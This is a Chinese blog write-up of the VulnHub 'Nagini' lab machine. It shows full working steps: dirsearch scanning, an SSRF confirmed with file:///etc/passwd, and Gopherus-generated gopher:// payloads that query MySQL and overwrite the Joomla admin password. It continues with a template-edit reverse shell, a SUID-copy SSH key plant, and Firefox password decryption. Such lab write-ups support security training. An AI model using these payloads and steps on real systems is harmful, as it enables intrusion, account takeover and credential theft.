2022-01-05

VulnHub-Nagini

前言

　　这是打靶训练的第17周，靶机下载，难度中，这套靶机让我了解到了ssrf原理以及利用方式。

信息搜集

　　扫到80和22端口，访问首页
　　
　　目录扫描得到/joomla/administrator，后台页面
　　
　　joomla老朋友了，使用joomscan进行详细探测后，得到版本为Joomla 3.9.25。此版本无exp。获取到备份文件configuration.php.bak
　　
　　查看备份文件，得到mysql连接信息，用户名goblin，密码空，只能本机访问
　　
　　没发现更多的东西，于是又转到目录探测，再次使用dirsearch，发现note.txt

dirsearch -u http://192.168.2.205/ -f -e html,php,txt -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

　　
　　访问得到以下内容
　　
　　告诉我们要使用http3协议来访问，先绑定好host，直接访问https://quic.nagini.hogwarts会失败的。这里我尝试了一下午都没有成功访问。
　　以下是苑老师给的步骤，你们可以尝试一下

apt install cargo
apt install cmake
apt purge rustc
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
source $HOME/.cargo/env
git clone https://github.com/cloudflare/quiche.git
cargo build --examples
cargo test
cd quiche/target/debug/examples
./http3-client https://quic.nagini.hogwarts

　　
　　成功访问后，告诉我们两个信息，有一个.bak文件，备份文件之前就已经得到了。第二个信息存在internalResourceFeTcher.php文件

SSRF

　　访问internalResourceFeTcher.php
　　
　　英文意思：欢迎来到内部网络资源获取页面
　　poc file:///etc/passwd，可成功读取，存在ssrf
　　
　　SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下，SSRF攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端发起的，所以它能够请求到与它相连而与外网隔离的内部系统）

　　SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容，加载指定地址的图片，下载等等。利用的是服务端的请求伪造。ssrf是利用存在缺陷的web应用作为代理攻击远程和本地的服务器
　　
　　而在利用ssrf离不开gopher协议，使用gopher://127.0.0.1:3306，发现网页开启了3306端口。使用Gopherus，专门利用gopher+ssrf的工具。
　　python gopherus.py --exploit mysql ，先查看joomla数据库中有那些表
　　
　　之后会给出对应的exp

gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%19%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%20%73%68%6f%77%20%74%61%62%6c%65%73%3b%01%00%00%00%01

　　多次提交后，得到结果
　　
　　继续查看joomla_users表中的数据
　　

gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%28%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%20%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%6a%6f%6f%6d%6c%61%5f%75%73%65%72%73%3b%01%00%00%00%01

　　得到用户名site_admin，密码被加密了
　　
　　这种情况，直接改它密码就行，设置密码为secret

use joomla; update joomla_users set password='d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199'

gopher://127.0.0.1:3306/_%a5%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%67%6f%62%6c%69%6e%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%71%00%00%00%03%75%73%65%20%6a%6f%6f%6d%6c%61%3b%20%75%70%64%61%74%65%20%6a%6f%6f%6d%6c%61%5f%75%73%65%72%73%20%73%65%74%20%70%61%73%73%77%6f%72%64%3d%27%64%32%30%36%34%64%33%35%38%31%33%36%39%39%36%62%64%32%32%34%32%31%35%38%34%61%37%63%62%33%33%65%3a%74%72%64%37%54%76%4b%48%78%36%64%4d%65%6f%4d%6d%42%56%78%59%6d%67%30%76%75%58%45%41%34%31%39%39%27%01%00%00%00%01

getshell

　　进入后台后，直接编辑模板文件，保存访问即可反弹shell
　　
　　
　　cat /home/snape/.creds.txt,解密出来是Love@lilly
　　
　　使用用户名:snape 密码:Love@lilly，成功ssh登录后，来到/home/hermoine/bin，发现su_cp有suid权限
　　
　　此程序的功能是复制
　　

ssh公钥登录

　　生成试试公钥密钥对ssh-keygen，直接回车即可
　　
　　之后将id_rsa.pub拷贝到靶机上，scp id_rsa.pub snape@192.168.2.205:~/

mv id_rsa.pub authorized_keys
chmod 640 authorized_keys
cd /home/hermoine/bin/
./su_cp -p /home/snape/authorized_keys /home/hermoine/.ssh/

　　
　　直接ssh hermoine@192.168.2.205，免密登录
　　

提权

　　存在/home/hermoine/.mozilla文件夹，此文件夹存放了firefox保存的密码等等信息
　　
　　将.mozilla拷贝到kali scp -rp hermoine@192.168.2.205:/home/hermoine/.mozilla /root
　　接下来使用firefox_decrypt对firefox进行解密，python3 firefox_decrypt.py /root/.mozilla/firefox，得到账号
　　
　　打靶结束
　　

本文标题:VulnHub-Nagini

文章作者:麦当

发布时间:2022-01-05, 20:28:42

最后更新:2022-01-05, 20:28:42

原始链接:https://maidang.cool/2022/17805.html

许可协议: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

查看评论 -